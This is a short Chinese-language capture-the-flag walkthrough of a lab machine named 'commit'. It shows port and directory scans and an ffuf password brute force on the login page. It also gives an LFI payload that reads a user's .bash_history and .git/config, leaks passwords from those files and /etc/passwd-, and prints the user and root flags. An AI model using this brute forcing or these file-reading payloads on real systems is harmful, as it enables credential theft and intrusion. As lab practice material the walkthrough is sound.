3.【测试】commit
1. 信息收集
1.1. 端口扫描
┌──(root㉿kali)-[~]
└─# nmap -sCV 192.168.56.107 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-17 22:54 EDT
Nmap scan report for 192.168.56.107
Host is up (0.0021s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: DevSecOps Platform v3.0
|_http-server-header: Apache/2.4.62 (Debian)
2222/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
MAC Address: 08:00:27:1E:C7:45 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.32 seconds
1.2. 目录扫描
┌──(root㉿kali)-[~/Desktop/hmv/commit]
└─# dirsearch -u 192.168.56.107
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/Desktop/hmv/commit/reports/_192.168.56.107/_25-05-17_23-06-35.txt
Target: http://192.168.56.107/
[23:06:35] Starting:
[23:06:36] 403 - 279B - /.ht_wsr.txt
[23:06:36] 403 - 279B - /.htaccess.bak1
[23:06:36] 403 - 279B - /.htaccess.orig
[23:06:36] 403 - 279B - /.htaccess.sample
[23:06:36] 403 - 279B - /.htaccess.save
[23:06:36] 403 - 279B - /.htaccess_orig
[23:06:36] 403 - 279B - /.htaccess_extra
[23:06:36] 403 - 279B - /.htaccessOLD
[23:06:36] 403 - 279B - /.htaccessOLD2
[23:06:36] 403 - 279B - /.htaccessBAK
[23:06:36] 403 - 279B - /.htaccess_sc
[23:06:36] 403 - 279B - /.htm
[23:06:36] 403 - 279B - /.html
[23:06:36] 403 - 279B - /.htpasswd_test
[23:06:36] 403 - 279B - /.htpasswds
[23:06:36] 403 - 279B - /.php
[23:06:37] 403 - 279B - /.httr-oauth
[23:06:44] 302 - 0B - /dashboard.php -> login.php
[23:06:48] 200 - 655B - /login.php
[23:06:54] 403 - 279B - /server-status
[23:06:54] 403 - 279B - /server-status/
[23:06:57] 301 - 318B - /uploads -> http://192.168.56.107/uploads/
[23:06:57] 200 - 407B - /uploads/
┌──(root㉿kali)-[~/Desktop/hmv/commit]
└─# ffuf -u http://192.168.56.107/login.php -X POST -d 'username=admin&password=FUZZ' -w /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-10000.txt |grep -v 'Size: 1726'
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : POST
:: URL : http://192.168.56.107/login.php
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-10000.txt
:: Data : username=admin&password=FUZZ
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
:: Progress: [10000/10000] :: Job [1/1] :: 6451 req/sec :: Duration: [0:00:01] :: Errors: 0 ::
f12 看到了测试账号
1.3. LFI
file=file:///home/lingmj/.bash_history
/dashboard.php?file=file:///home/lingmj/.git/config
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
#lingmj:10839254acf247b9e456d713d673f9ee
10839254acf247b9e456d713d673f9ee就是密码,不是md5
lingmj@Commit:~$ cat user.txt
flag{user-3d442179fc3b320d70689ebb7cb764af}
1.4. welcome
welcome@Commit:/home$ cat /etc/passwd-
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
welcome:x:1000:1000:3d442179fc3b320d70689ebb7cb764af:/home/welcome:/bin/bash
lingmj:x:1001:1001::/home/lingmj:/bin/bash
welcome:3d442179fc3b320d70689ebb7cb764a
1.5. root
sshd_config
flag{root-0249c05215c01f5cb86b0832932e170f}